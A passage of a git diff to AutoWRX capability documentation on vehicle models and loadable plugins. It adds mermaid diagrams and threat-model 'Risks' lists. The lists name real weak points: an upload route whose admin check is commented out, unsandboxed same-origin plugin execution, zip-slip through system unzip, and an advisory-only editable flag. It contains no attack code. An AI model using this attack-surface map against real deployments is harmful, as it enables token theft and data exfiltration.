+- **Divergent retention:** retention is delegated to the target services; with no platform control, user data may be retained far longer than the source system's policy allows.

--- a/docs/capabilities/models.md
+++ b/docs/capabilities/models.md
@@ -2,73 +2,288 @@
 
 The vehicle-model domain and its layout. Backend: `routes/v2/vehicle-data/model.route.js`, `models/model.model.js`. Frontend: `pages/{PageModelList,PageModelDetail}.tsx`, `layouts/ModelDetailLayout.tsx`.
 
+```mermaid
+flowchart TD
+    subgraph Lifecycle
+        A["List / discover<br/>(My Models · Contributions · Public)"] --> B["Create / Import ZIP"]
+        B --> C["Detail / edit<br/>(visibility · state · props)"]
+        C --> D["Tabs & addons<br/>(custom layout)"]
+        C --> E["Contributors & permissions"]
+        C --> F["Export ZIP / VSS JSON"]
+        C --> G["Delete"]
+    end
+    H["Admin: Model Templates"] -.->|layout scaffold| B
+    I["Model stats"] -.->|counts by id| A
+    J[("models collection")]
+    B --> J
+    C --> J
+    E -->|UserRole binding| J
+    style J fill:#fef3c7
+```
+
 ---
 
 ## Model list / create / import
 
-- **Description:** Browse models in three sections (My Models, My Contributions, Public); create a model; import a model from a ZIP archive.
-- **Who uses it / value:** End users (discover models); model owners (create/import); the wider community (public discovery when `PUBLIC_VIEWING`).
-- **Acceptance criteria:**
-  - `GET /v2/models` (optional auth via `PUBLIC_VIEWING`) → `200` paginated list with query filters (`name`, `visibility`, `state`, `tenant_id`, `vehicle_category`, `main_api`, `id`, `created_by`, `is_contributor`, `include_stats`, `sortBy`, `page`, `limit`, `fields`).
-  - `GET /v2/models/all` → expanded/unpaginated aggregation of owned + contributed + public-released models (optional auth via `PUBLIC_VIEWING`; owned/contributed only populated for authenticated users).
-  - `POST /v2/models` (auth) → `201` new model. `POST /v2/models/stats` (optional auth) → `200 { statsById: { [modelId]: {...} } }` for the body `ids`.
-  - Import from ZIP (`zipUtils.ts`) creates a model from the archive contents.
-  - Signed-out with `PUBLIC_VIEWING=false` → `401` on list.
-- **Quality control:** Create a model → appears in "My Models"; import a valid model ZIP → model created; sign out + `PUBLIC_VIEWING=true` → public models listed; `PUBLIC_VIEWING=false` → `401`.
-- **Security:** Read optional via `PUBLIC_VIEWING`; create requires auth. Filters don't leak private models (server filters by access).
-- **Data protection:** Model metadata (name, description, visibility, state, images, tags) stored in `models`; images uploaded via the file service.
+### Description
+
+Browse models in three sections (My Models, My Contributions, Public); create a model; import a model from a ZIP archive.
+
+### Who uses it / value
+
+End users (discover models); model owners (create/import); the wider community (public discovery when `PUBLIC_VIEWING`).
+
+### Acceptance criteria
+
+- `GET /v2/models` (optional auth via `PUBLIC_VIEWING`) → `200` paginated list with query filters (`name`, `visibility`, `state`, `tenant_id`, `vehicle_category`, `main_api`, `id`, `created_by`, `is_contributor`, `include_stats`, `sortBy`, `page`, `limit`, `fields`).
+- `GET /v2/models/all` → expanded/unpaginated aggregation of owned + contributed + public-released models (optional auth via `PUBLIC_VIEWING`; owned/contributed only populated for authenticated users).
+- `POST /v2/models` (auth) → `201` new model. `POST /v2/models/stats` (optional auth) → `200 { statsById: { [modelId]: {...} } }` for the body `ids`.
+- Import from ZIP (`zipUtils.ts`) creates a model from the archive contents.
+- Signed-out with `PUBLIC_VIEWING=false` → `401` on list.
+
+### Quality control
+
+Create a model → appears in "My Models"; import a valid model ZIP → model created; sign out + `PUBLIC_VIEWING=true` → public models listed; `PUBLIC_VIEWING=false` → `401`.
+
+```mermaid
+flowchart LR
+    U([User]) -->|"GET /v2/models"| L{PUBLIC_VIEWING?}
+    L -->|true + anon| PUB["Public section"]
+    L -->|false + anon| N1["401"]
+    L -->|authed| ALL["My Models · Contributions · Public"]
+    U -->|"POST /v2/models"| C["Create (auth)"]
+    U -->|"import .zip"| Z["zipUtils → model"]
+```
+
+### Security
+
+Read optional via `PUBLIC_VIEWING`; create requires auth. Filters don't leak private models (server filters by access).
+
+**Risks:**
+- **Private-model enumeration:** without server-side access scoping, a signed-out or cross-tenant user could enumerate private models through list filters, leaking proprietary vehicle data and model IP.
+- **Anonymous model creation:** a missing auth check on `POST` would let anonymous users spawn models inside any tenant, polluting namespaces and consuming storage.
+
+### Data protection
+
+Model metadata (name, description, visibility, state, images, tags) stored in `models`; images uploaded via the file service.
+
+**Risks:**
+- **Visibility misconfiguration:** an over-broad `WRITE_MODEL` grant or a wrong default could expose private models publicly.
+- **Irreversible deletion:** deleted models are hard-removed (no soft-delete), so accidental or malicious deletion is permanent user-data loss.
 
 ## Model detail / edit
 
-- **Description:** View/edit a model's name, home image, vehicle properties, visibility (public/private), state (draft/released/blocked), contributors; export the model as ZIP; download the computed VSS JSON; delete.
-- **Who uses it / value:** Model owners (maintain models); contributors (collaborate); consumers (export/download).
-- **Acceptance criteria:**
-  - `GET /v2/models/:id` (optional auth) → `200` model (authorized users get `contributors`/`members` injected). `PATCH /v2/models/:id` → `200` (requires `WRITE_MODEL`). `DELETE /v2/models/:id` → `204` (requires `WRITE_MODEL`).
-  - Export ZIP / download computed VSS from the UI actions.
-  - No `WRITE_MODEL` → `403` on edit/delete.
-- **Quality control:** Edit visibility to private → signed-out users can't see it; change state to released → appears publicly; export → valid ZIP; delete → gone from list.
-- **Security:** Read `READ_MODEL`; write `WRITE_MODEL` (owner/admin/contributor). Owners bypass.
-- **Data protection:** Visibility controls exposure; deleted models removed from the collection (no soft-delete). Export includes prototype code/data.
+### Description
+
+View/edit a model's name, home image, vehicle properties, visibility (public/private), state (draft/released/blocked), contributors; export the model as ZIP; download the computed VSS JSON; delete.
+
+### Who uses it / value
+
+Model owners (maintain models); contributors (collaborate); consumers (export/download).
+
+### Acceptance criteria
+
+- `GET /v2/models/:id` (optional auth) → `200` model (authorized users get `contributors`/`members` injected). `PATCH /v2/models/:id` → `200` (requires `WRITE_MODEL`). `DELETE /v2/models/:id` → `204` (requires `WRITE_MODEL`).
+- Export ZIP / download computed VSS from the UI actions.
+- No `WRITE_MODEL` → `403` on edit/delete.
+
+### Quality control
+
+Edit visibility to private → signed-out users can't see it; change state to released → appears publicly; export → valid ZIP; delete → gone from list.
+
+```mermaid
+stateDiagram-v2
+    [*] --> draft
+    draft --> released: owner releases
+    released --> blocked: admin blocks
+    blocked --> released: admin unblocks
+    draft --> blocked: admin blocks
+    released --> [*]: delete
+    draft --> [*]: delete
+    note right of released
+      visibility: public | private
+    end note
+```
+
+### Security
+
+Read `READ_MODEL`; write `WRITE_MODEL` (owner/admin/contributor). Owners bypass.
+
+**Risks:**
+- **Unauthorized state/visibility flip:** a broken `WRITE_MODEL` check would let any user flip a private model to `public`/`released`, exposing it.
+- **Unauthorized delete:** missing checks would let a non-owner delete others' models — irreversible data loss.
+- **Export exfiltration:** export bundles the model's prototype code/data, so a leaked edit token widens what an attacker can steal.
+
+### Data protection
+
+Visibility controls exposure; deleted models removed from the collection (no soft-delete). Export includes prototype code/data.
+
+**Risks:**
+- **Public exposure of embedded data:** flipping visibility to public exposes the model and its embedded prototype code/data to everyone — including data the owner believed was private.
+- **Permanent destruction:** hard-delete means a compromised or malicious contributor can permanently destroy model data with no recovery trail.
 
 ## Model tabs & addons
 
-- **Description:** Tabbed model layout (Overview / Prototype Library / Vehicle API + custom plugin tabs); owners add/reorder/hide tabs, set variant, configure a sidebar plugin and right-nav buttons; save the layout as a Model Template.
-- **Who uses it / value:** Model owners (customize the workspace); end users (tailored model views); admins (define reusable layouts).
-- **Acceptance criteria:**
-  - Tab configuration stored on `model.custom_template` (`model_tabs`, `prototype_tabs`, `prototype_sidebar_plugin`, `prototype_right_nav_buttons`).
-  - Addon/tab management requires `WRITE_MODEL` + `ALLOW_NON_ADMIN_ADDON_CONFIG` (admins always allowed).
-  - "Save as Template" (admin) stores the layout as a Model Template.
-- **Quality control:** Add a plugin addon tab → it renders via `PluginPageRender`; reorder/hide tabs → layout persists; as non-admin with `ALLOW_NON_ADMIN_ADDON_CONFIG=false` → addon config blocked.
-- **Security:** Tab management gated by `WRITE_MODEL` + the addon-config flag. Plugins run unsandboxed (see [plugins.md](./plugins.md)).
-- **Data protection:** Layout config stored on the model document; no secrets.
+### Description
+
+Tabbed model layout (Overview / Prototype Library / Vehicle API + custom plugin tabs); owners add/reorder/hide tabs, set variant, configure a sidebar plugin and right-nav buttons; save the layout as a Model Template.
+
+### Who uses it / value
+
+Model owners (customize the workspace); end users (tailored model views); admins (define reusable layouts).
+
+### Acceptance criteria
+
+- Tab configuration stored on `model.custom_template` (`model_tabs`, `prototype_tabs`, `prototype_sidebar_plugin`, `prototype_right_nav_buttons`).
+- Addon/tab management requires `WRITE_MODEL` + `ALLOW_NON_ADMIN_ADDON_CONFIG` (admins always allowed).
+- "Save as Template" (admin) stores the layout as a Model Template.
+
+### Quality control
+
+Add a plugin addon tab → it renders via `PluginPageRender`; reorder/hide tabs → layout persists; as non-admin with `ALLOW_NON_ADMIN_ADDON_CONFIG=false` → addon config blocked.
+
+```mermaid
+flowchart TD
+    O([Model owner]) -->|configure tabs| T["model.custom_template"]
+    T --> Tabs["model_tabs · prototype_tabs"]
+    T --> Side["prototype_sidebar_plugin"]
+    T --> Nav["prototype_right_nav_buttons"]
+    Tabs -->|renders| PR["PluginPageRender (unsandboxed)"]
+    O -->|"Save as Template"| MT["Model Template (admin)"]
+```
+
+### Security
+
+Tab management gated by `WRITE_MODEL` + the addon-config flag. Plugins run unsandboxed (see [plugins.md](./plugins.md)).
+
+**Risks:**
+- **Malicious tab injection:** a plugin addon tab embeds arbitrary code running unsandboxed in visitors' browsers. If the `ALLOW_NON_ADMIN_ADDON_CONFIG` gate were bypassed, a non-admin could inject a hostile tab into every visitor's view (XSS / token theft).
+- **Plugin supply chain:** a tab config references plugin IDs; a compromised or rogue plugin becomes an attack surface for all models using that layout.
+
+### Data protection
+
+Layout config stored on the model document; no secrets.
+
+**Risks:**
+- **Untrusted-code distribution:** the tab config is a persistence channel — a malicious layout can repeatedly steer users toward running untrusted plugins until it is noticed and removed.
 
 ## Model contributors & permissions
 
-- **Description:** Add/remove authorized users (contributors/members) on a model; the model appears in their "My Contributions".
-- **Who uses it / value:** Model owners (delegate editing); contributors (gain access).
-- **Acceptance criteria:**
-  - `POST /v2/models/:id/permissions {userId, role}` (requires `WRITE_MODEL`) → `201` adds authorized user.
-  - `DELETE /v2/models/:id/permissions?userId=&role=` (requires `WRITE_MODEL`) → `204` removes.
-- **Quality control:** Add a contributor → they see the model under "My Contributions" and can edit (if `writeModel`); remove → access revoked.
-- **Security:** Both operations require `WRITE_MODEL` on the model. Owners bypass.
-- **Data protection:** Creates/removes UserRole bindings scoped to the model `ref`.
+### Description
+
+Add/remove authorized users (contributors/members) on a model; the model appears in their "My Contributions".
+
+### Who uses it / value
+
+Model owners (delegate editing); contributors (gain access).
+
+### Acceptance criteria
+
+- `POST /v2/models/:id/permissions {userId, role}` (requires `WRITE_MODEL`) → `201` adds authorized user.
+- `DELETE /v2/models/:id/permissions?userId=&role=` (requires `WRITE_MODEL`) → `204` removes.
+
+### Quality control
+
+Add a contributor → they see the model under "My Contributions" and can edit (if `writeModel`); remove → access revoked.
+
+```mermaid
+sequenceDiagram
+    participant U as Owner
+    participant API as /v2/models/:id/permissions
+    participant DB as UserRole binding
+    U->>API: POST {userId, role}
+    API->>API: check WRITE_MODEL
+    API->>DB: create binding (model ref)
+    API-->>U: 201
+    Note over DB: model appears in user's "My Contributions"
+    U->>API: DELETE ?userId=&role=
+    API->>DB: remove binding
+    API-->>U: 204
+```
+
+### Security
+
+Both operations require `WRITE_MODEL` on the model. Owners bypass.
+
+**Risks:**
+- **Privilege escalation:** a missing `WRITE_MODEL` check would let any user grant themselves or others write access to private models — escalation to data theft or tampering.
+
+### Data protection
+
+Creates/removes UserRole bindings scoped to the model `ref`.
+
+**Risks:**
+- **Relationship leak:** contributor bindings reveal who collaborates on which model (users ↔ business assets).
+- **Persistence of mis-grants:** a leaked grant persists until manually revoked; with no audit trail of permission changes, mis-grants are hard to detect after the fact.
 
 ## Model stats
 
-- **Description:** Aggregated stats (e.g. prototype counts) by model IDs, cached per request.
-- **Who uses it / value:** End users (model badges/counts); owners (overview).
-- **Acceptance criteria:**
-  - `POST /v2/models/stats {ids:[...]}` (optional auth via `PUBLIC_VIEWING`) → `200 { statsById: { [modelId]: {...} } }`; empty/missing → `{ statsById: {} }`.
-- **Quality control:** Request stats for a few model IDs → counts returned; request none → empty map.
-- **Security:** Optional auth; respects access scoping.
-- **Data protection:** Aggregated only; no PII.
+### Description
+
+Aggregated stats (e.g. prototype counts) by model IDs, cached per request.
+
+### Who uses it / value
+
+End users (model badges/counts); owners (overview).
+
+### Acceptance criteria
+
+- `POST /v2/models/stats {ids:[...]}` (optional auth via `PUBLIC_VIEWING`) → `200 { statsById: { [modelId]: {...} } }`; empty/missing → `{ statsById: {} }`.
+
+### Quality control
+
+Request stats for a few model IDs → counts returned; request none → empty map.
+
+### Security
+
+Optional auth; respects access scoping.
+
+**Risks:**
+- **Metadata enumeration:** if the aggregation didn't respect access scoping, an attacker could probe arbitrary model IDs to confirm the existence and size of private models even when the list endpoint is locked down.
+
+### Data protection
+
+Aggregated only; no PII.
+
+**Risks:**
+- **Existence/scale inference:** counts alone reveal the existence and scale of models; combined with a listing gap this could confirm private assets.
 
 ## Model templates
 
-- **Description:** Admin-managed scaffolds for model layouts (`custom_template`), with a single `default` template; seeded/managed via the templates admin page.
-- **Who uses it / value:** Admins (standardize layouts); model creators (quick-start from a template).
-- **Acceptance criteria:**
-  - `GET /v2/model-template[/:id]` (public) → list/get; `POST /v2/model-template` → `201` (admin); `PUT/DELETE /v2/model-template/:id` → `200`/`204` (admin). Also at `/v2/system/model-template`.
-- **Quality control:** Admin creates a template → it appears in the model-template manager; select it when creating a model → layout applied.
-- **Security:** Read public; write requires `MANAGE_USERS`.
-- **Data protection:** Template config (tabs/prototype tabs/sidebar) stored; no secrets.
+### Description
+
+Admin-managed scaffolds for model layouts (`custom_template`), with a single `default` template; seeded/managed via the templates admin page.
+
+### Who uses it / value
+
+Admins (standardize layouts); model creators (quick-start from a template).
+
+### Acceptance criteria
+
+- `GET /v2/model-template[/:id]` (public) → list/get; `POST /v2/model-template` → `201` (admin); `PUT/DELETE /v2/model-template/:id` → `200`/`204` (admin). Also at `/v2/system/model-template`.
+
+### Quality control
+
+Admin creates a template → it appears in the model-template manager; select it when creating a model → layout applied.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|POST/PUT| T["model-template (default)"]
+    C([Creator]) -->|"new model from template"| M["model.custom_template"]
+    T -.->|layout applied| M
+    T -.->|references| P["plugin IDs"]
+```
+
+### Security
+
+Read public; write requires `MANAGE_USERS`.
+
+**Risks:**
+- **Platform-wide payload:** templates apply to every model created from them. A compromised admin could seed a default template embedding a malicious plugin tab, pushing untrusted code to all future models.
+
+### Data protection
+
+Template config (tabs/prototype tabs/sidebar) stored; no secrets.
+
+**Risks:**
+- **Persistent distribution channel:** a malicious template propagates its layout and referenced plugins to all derived models until an admin notices and removes it.

--- a/docs/capabilities/plugins.md
+++ b/docs/capabilities/plugins.md
@@ -2,79 +2,334 @@
 
 The loadable-plugin system: a plugin is a standalone React bundle AutoWRX loads dynamically at runtime and renders inside a model/prototype tab or a deploy/staging stage. Backend: `routes/v2/system/plugin.route.js`, `controllers/plugin.controller.js`. Frontend: `components/organisms/{PluginPageRender,PluginForm}.tsx`. See the [Plugin Development guide](../guides/plugin/README.md) for authoring.
 
+```mermaid
+flowchart TD
+    A["Registry & CRUD<br/>(plugin metadata)"] --> B["Upload & static hosting<br/>(zip → backend/static/plugin/:slug)"]
+    B --> C["Loader<br/>(inject script → window.DAPlugins)"]
+    C --> D["Preload<br/>(prefetch scripts)"]
+    C --> E["Render<br/>(PluginPageRender in tab/stage)"]
+    F["Addon select / tab editor<br/>(model.custom_template)"] --> E
+    G["My Plugins / Admin management<br/>(/me/plugins · /admin/plugins)"] --> A
+    G --> H["Staging stage → plugin mapping"]
+    H --> E
+    style C fill:#fef3c7
+    style E fill:#fef3c7
+```
+
 ---
 
 ## Plugin registry & CRUD
 
-- **Description:** Catalog of plugins (`type` `prototype_function` or `deploy`) with slug, image, description, internal/external flag, URL, config; slug auto-generated from name; ownership-gated edits.
-- **Who uses it / value:** Plugin authors (publish plugins); model owners/admins (attach plugins as addon tabs).
-- **Acceptance criteria:**
-  - `GET /v2/plugin` (public) → list; `GET /v2/plugin/{admin,id/:id,slug/:slug}` → admin/own/by-id/by-slug; `GET /v2/plugin/mine` (auth) → own; `POST /v2/plugin` (auth) → `201`; `PUT /v2/plugin/:id` (auth + ownership/admin) → `200`; `DELETE /v2/plugin/:id` (auth + ownership/admin) → `204`.
-  - `slug` forbidden on update (immutable); auto-generated on create (unique with auto-suffix).
-- **Quality control:** Create a plugin → slug generated; list shows it (public read); edit your own → ok; edit another user's → `403`; delete → `204`.
-- **Security:** Reads public; writes require auth + ownership (or admin). ⚠️ `checkPermission(ADMIN)` on the upload route is commented out — any authenticated user can upload (subject to per-slug ownership).
-- **Data protection:** Plugin metadata + `config` (Mixed) stored in `plugins` with `created_by`/`updated_by`.
+### Description
+
+Catalog of plugins (`type` `prototype_function` or `deploy`) with slug, image, description, internal/external flag, URL, config; slug auto-generated from name; ownership-gated edits.
+
+### Who uses it / value
+
+Plugin authors (publish plugins); model owners/admins (attach plugins as addon tabs).
+
+### Acceptance criteria
+
+- `GET /v2/plugin` (public) → list; `GET /v2/plugin/{admin,id/:id,slug/:slug}` → admin/own/by-id/by-slug; `GET /v2/plugin/mine` (auth) → own; `POST /v2/plugin` (auth) → `201`; `PUT /v2/plugin/:id` (auth + ownership/admin) → `200`; `DELETE /v2/plugin/:id` (auth + ownership/admin) → `204`.
+- `slug` forbidden on update (immutable); auto-generated on create (unique with auto-suffix).
+
+### Quality control
+
+Create a plugin → slug generated; list shows it (public read); edit your own → ok; edit another user's → `403`; delete → `204`.
+
+```mermaid
+flowchart LR
+    U([Author]) -->|"POST /v2/plugin"| C["Create (auth) → 201"]
+    C -->|auto slug| P[("plugins")]
+    U -->|"PUT /v2/plugin/:id"| P
+    U -->|"DELETE /v2/plugin/:id"| P
+    R([Anyone]) -->|"GET /v2/plugin"| L["Public list"]
+    L --> P
+```
+
+### Security
+
+Reads public; writes require auth + ownership (or admin). The `checkPermission(ADMIN)` on the upload route is commented out — any authenticated user can upload (subject to per-slug ownership).
+
+**Risks:**
+- **Anonymous-style metadata spoofing:** public read access lets attackers enumerate all plugin slugs, URLs, and config, mapping the attack surface for later exploitation or impersonation via look-alike slugs.
+- **Ownership bypass on update/delete:** a broken ownership check would let any authenticated user overwrite or delete another author's plugin, swapping a trusted bundle for a malicious one (supply-chain takeover).
+- **Commented-out admin gate:** with the `ADMIN` check disabled on upload, any authenticated user can publish plugins, lowering the bar for injecting malicious code into the registry.
+
+### Data protection
+
+Plugin metadata + `config` (Mixed) stored in `plugins` with `created_by`/`updated_by`.
+
+**Risks:**
+- **Config secret leakage:** the `config` field is Mixed/untyped; if an author stores API keys or tokens in plugin config, the public `GET /v2/plugin` read exposes them to every visitor.
+- **Author identity disclosure:** `created_by`/`updated_by` on a public-read document leaks which users author which plugins, enabling targeted harassment or account takeover of high-value authors.
 
 ## Internal plugin upload & static hosting
 
-- **Description:** Upload a plugin zip, extract via system `unzip` into `backend/static/plugin/:slug`, auto-detect entry (`index.js`/`index.html`), serve at `/plugin/:slug/...`.
-- **Who uses it / value:** Plugin authors (host plugins without an external CDN); admins (bundle system plugins).
-- **Acceptance criteria:**
-  - `POST /v2/plugin/upload/:slug` (auth; multipart `file`) → `200 { plugin, url }`; extracted to `backend/static/plugin/<slug>/`; served at `/plugin/<slug>/<entry>` with `is_internal=true`.
-  - Existing slug owned by another non-admin → `403`.
-- **Quality control:** Upload a zip → extracted + served; re-upload same slug (owner) → updates; upload to another user's slug → `403`.
-- **Security:** Auth required; ownership enforced on existing slug. Upload accepts any file type (50 MB limit) and runs system `unzip` — treat as trusted code. Admin gate commented out (see above).
-- **Data protection:** Plugin bundle served publicly from `/plugin/<slug>/`; the bundle can contain arbitrary JS (executes in users' browsers).
+### Description
+
+Upload a plugin zip, extract via system `unzip` into `backend/static/plugin/:slug`, auto-detect entry (`index.js`/`index.html`), serve at `/plugin/:slug/...`.
+
+### Who uses it / value
+
+Plugin authors (host plugins without an external CDN); admins (bundle system plugins).
+
+### Acceptance criteria
+
+- `POST /v2/plugin/upload/:slug` (auth; multipart `file`) → `200 { plugin, url }`; extracted to `backend/static/plugin/<slug>/`; served at `/plugin/<slug>/<entry>` with `is_internal=true`.
+- Existing slug owned by another non-admin → `403`.
+
+### Quality control
+
+Upload a zip → extracted + served; re-upload same slug (owner) → updates; upload to another user's slug → `403`.
+
+```mermaid
+sequenceDiagram
+    participant U as Author
+    participant API as POST /v2/plugin/upload/:slug
+    participant FS as backend/static/plugin/:slug
+    participant W as Browser
+    U->>API: multipart file (auth)
+    API->>API: check slug ownership
+    API->>FS: system unzip → index.js/index.html
+    API-->>U: 200 { plugin, url }
+    W->>FS: GET /plugin/:slug/<entry>
+    FS-->>W: bundle (executes unsandboxed)
+```
+
+### Security
+
+Auth required; ownership enforced on existing slug. Upload accepts any file type (50 MB limit) and runs system `unzip` — treat as trusted code. Admin gate commented out (see above).
+
+**Risks:**
+- **Zip-slip / arbitrary file write:** invoking system `unzip` on untrusted archives risks path-traversal (zip-slip) writing files outside `static/plugin/:slug`, potentially overwriting server code or config.
+- **Malicious bundle execution:** the uploaded bundle runs unsandboxed in every visitor's browser; a compromised or rogue author can push XSS, token theft, or data-exfiltration code to all users who open the tab.
+- **Unrestricted file type:** accepting any file type with only a 50 MB cap allows non-JS payloads (e.g. large binary blobs, polyglot files) to be hosted and abused for storage abuse or content-type confusion attacks.
+
+### Data protection
+
+Plugin bundle served publicly from `/plugin/<slug>/`; the bundle can contain arbitrary JS (executes in users' browsers).
+
+**Risks:**
+- **Public bundle exposure:** once hosted, the bundle is world-readable; any sensitive data baked into the bundle (author secrets, tenant data) is permanently exfiltrated and irretrievable.
+- **Bundle persistence after delete:** extracted files under `backend/static/plugin/:slug` may persist on disk even if the registry record is deleted, leaving stale malicious code publicly reachable.
 
 ## Plugin loader
 
-- **Description:** Fetches the plugin URL, injects a `<script>` (module first, classic fallback), primes `window.React`/`ReactDOM`/`require` shim + `__webpack_require__.cache`, polls `window.DAPlugins['page-plugin']` up to 15 s, renders `components.Page` or wraps imperative `mount`/`unmount`; caches registrations per slug.
-- **Who uses it / value:** End users (plugin renders in tabs); plugin authors (the load contract).
-- **Acceptance criteria:**
-  - A tab referencing a plugin slug → host fetches metadata, injects script, plugin registers on `window.DAPlugins['page-plugin']`, renders with `{ data, editable, config, api }`.
-  - Registrations cached across unmounts (switching tabs doesn't re-inject). 15 s timeout on registration.
-- **Quality control:** Open a plugin tab → plugin renders; switch tabs and back → no reload (cached); a plugin that fails to register in 15 s → timeout.
-- **Security:** ⚠️ Same-origin, **unsandboxed** — full DOM/window access. Only **public** site configs surfaced (secrets never exposed). `editable` from `WRITE_MODEL` permission; advisory only (plugin can ignore).
-- **Data protection:** Plugin receives `data` (model/prototype), public site `config`, and the `PluginAPI`; no auth tokens/secrets passed.
+### Description
+
+Fetches the plugin URL, injects a `<script>` (module first, classic fallback), primes `window.React`/`ReactDOM`/`require` shim + `__webpack_require__.cache`, polls `window.DAPlugins['page-plugin']` up to 15 s, renders `components.Page` or wraps imperative `mount`/`unmount`; caches registrations per slug.
+
+### Who uses it / value
+
+End users (plugin renders in tabs); plugin authors (the load contract).
+
+### Acceptance criteria
+
+- A tab referencing a plugin slug → host fetches metadata, injects script, plugin registers on `window.DAPlugins['page-plugin']`, renders with `{ data, editable, config, api }`.
+- Registrations cached across unmounts (switching tabs doesn't re-inject). 15 s timeout on registration.
+
+### Quality control
+
+Open a plugin tab → plugin renders; switch tabs and back → no reload (cached); a plugin that fails to register in 15 s → timeout.
+
+```mermaid
+flowchart TD
+    T([Tab opens]) --> F["Fetch plugin metadata + URL"]
+    F --> I["Inject <script> module → classic fallback"]
+    I --> S["Prime window.React/ReactDOM + require shim"]
+    S --> P{"Poll window.DAPlugins['page-plugin'] ≤ 15s"}
+    P -->|registered| R["Render components.Page / mount()"]
+    P -->|timeout| X["Timeout"]
+    R --> Cache[("Cache registration per slug")]
+    Cache -.->|next tab open| R
+```
+
+### Security
+
+Same-origin, unsandboxed — full DOM/window access. Only public site configs surfaced (secrets never exposed). `editable` from `WRITE_MODEL` permission; advisory only (plugin can ignore).
+
+**Risks:**
+- **Unsandboxed code execution:** a loaded plugin has full access to `window`, DOM, cookies, and `localStorage`, enabling XSS, session-token theft, and silent exfiltration of any data the page holds.
+- **Global namespace pollution:** priming `window.React`, `window.ReactDOM`, the `require` shim, and `__webpack_require__.cache` lets a malicious plugin tamper with shared globals, breaking or hijacking other plugins and the host app.
+- **Advisory-only `editable`:** the `editable` flag is advisory; a plugin can ignore it and mutate model data despite the user lacking `WRITE_MODEL`, causing unauthorized data modification.
+
+### Data protection
+
+Plugin receives `data` (model/prototype), public site `config`, and the `PluginAPI`; no auth tokens/secrets passed.
+
+**Risks:**
+- **Model/prototype data exposure:** `data` passed to the plugin includes model and prototype contents; an unsandboxed plugin can exfiltrate proprietary vehicle data to an external endpoint.
+- **`PluginAPI` abuse:** the `PluginAPI` surface, even without tokens, may expose endpoints a plugin can call to read or modify data the user didn't intend to expose.
 
 ## Plugin preloading
 
-- **Description:** Background-prefetches plugin scripts for tabs/staging via `<link rel=prefetch>` + `fetch(priority=low)`.
-- **Who uses it / value:** End users (faster tab loads).
-- **Acceptance criteria:**
-  - Collects plugin slugs from prototype tabs + staging; prefetches on idle (`requestIdleCallback`, configurable delay).
-- **Quality control:** Open a model with plugin tabs → scripts prefetched → tab open is instant.
-- **Security:** Prefetches external URLs with `credentials:'omit'`.
-- **Data protection:** Only fetches public bundle URLs.
+### Description
+
+Background-prefetches plugin scripts for tabs/staging via `<link rel=prefetch>` + `fetch(priority=low)`.
+
+### Who uses it / value
+
+End users (faster tab loads).
+
+### Acceptance criteria
+
+- Collects plugin slugs from prototype tabs + staging; prefetches on idle (`requestIdleCallback`, configurable delay).
+
+### Quality control
+
+Open a model with plugin tabs → scripts prefetched → tab open is instant.
+
+```mermaid
+flowchart LR
+    M["Open model"] --> C["Collect plugin slugs (tabs + staging)"]
+    C --> I["requestIdleCallback (configurable delay)"]
+    I --> P["<link rel=prefetch> + fetch(priority=low)"]
+    P --> B["Plugin bundle cached"]
+    B -.->|instant| O["Tab open"]
+```
+
+### Security
+
+Prefetches external URLs with `credentials:'omit'`.
+
+**Risks:**
+- **External URL prefetch leak:** prefetching external plugin URLs reveals the user's browsing of a model to the external host (timing + access logs) even if the tab is never opened.
+- **Untrusted bundle warmed:** prefetching warms the cache for a bundle that will execute unsandboxed; a compromised external host can swap the bundle between prefetch and load, defeating integrity assumptions.
+
+### Data protection
+
+Only fetches public bundle URLs.
+
+**Risks:**
+- **User activity inference:** prefetch patterns (which slugs, how many) can reveal which models a user visits, leaking usage patterns to external plugin hosts via referer/log entries.
 
 ## Sample plugins
 
-- **Description:** `sample-tsx` (esbuild IIFE bundle) and `sample-esm` (no bundler) under `backend/static/plugin/`, demonstrating the registration contract.
-- **Who uses it / value:** Plugin authors (reference implementations).
-- **Acceptance criteria:**
-  - Both register on `window.DAPlugins['page-plugin']`; `sample-tsx/build.sh` builds with esbuild (externalizes React).
-- **Quality control:** Build sample-tsx → `index.js`; load via the test page → renders.
-- **Security:** Same as any plugin (unsandboxed).
-- **Data protection:** Static sample assets.
+### Description
+
+`sample-tsx` (esbuild IIFE bundle) and `sample-esm` (no bundler) under `backend/static/plugin/`, demonstrating the registration contract.
+
+### Who uses it / value
+
+Plugin authors (reference implementations).
+
+### Acceptance criteria
+
+- Both register on `window.DAPlugins['page-plugin']`; `sample-tsx/build.sh` builds with esbuild (externalizes React).
+
+### Quality control
+
+Build sample-tsx → `index.js`; load via the test page → renders.
+
+### Security
+
+Same as any plugin (unsandboxed).
+
+**Risks:**
+- **Copy-paste of insecure patterns:** samples are the template authors copy; if a sample ships an insecure pattern (e.g. trusting `data`, calling `eval`), it propagates to community plugins.
+- **Static asset tampering:** samples live under `backend/static/plugin/`; if write access is not restricted, an attacker who can modify them can poison the reference implementation every author trusts.
+
+### Data protection
+
+Static sample assets.
+
+**Risks:**
+- **No user data involved:** samples are static reference bundles with no user data; the residual risk is only that a tampered sample misleads authors into embedding malicious code.
 
 ## Addon select / custom tab editor
 
-- **Description:** Pick a plugin addon to add as a custom tab; reorder/edit/hide tabs; set variant; configure a sidebar plugin + right-nav action buttons (incl. built-in Staging); choose open mode (dialog/page).
-- **Who uses it / value:** Model owners (customize workspace); admins.
-- **Acceptance criteria:**
-  - Tab management requires `WRITE_MODEL` + `ALLOW_NON_ADMIN_ADDON_CONFIG` (admins always allowed).
-  - Tab config stored on `model.custom_template` (`model_tabs`/`prototype_tabs`/`prototype_sidebar_plugin`/`prototype_right_nav_buttons`).
-- **Quality control:** Add an addon tab → it renders via `PluginPageRender`; reorder/hide → persists; configure Staging right-nav button → appears.
-- **Security:** `WRITE_MODEL` + addon flag. Plugins unsandboxed.
-- **Data protection:** Tab/layout config on the model document.
+### Description
+
+Pick a plugin addon to add as a custom tab; reorder/edit/hide tabs; set variant; configure a sidebar plugin + right-nav action buttons (incl. built-in Staging); choose open mode (dialog/page).
+
+### Who uses it / value
+
+Model owners (customize workspace); admins.
+
+### Acceptance criteria
+
+- Tab management requires `WRITE_MODEL` + `ALLOW_NON_ADMIN_ADDON_CONFIG` (admins always allowed).
+- Tab config stored on `model.custom_template` (`model_tabs`/`prototype_tabs`/`prototype_sidebar_plugin`/`prototype_right_nav_buttons`).
+
+### Quality control
+
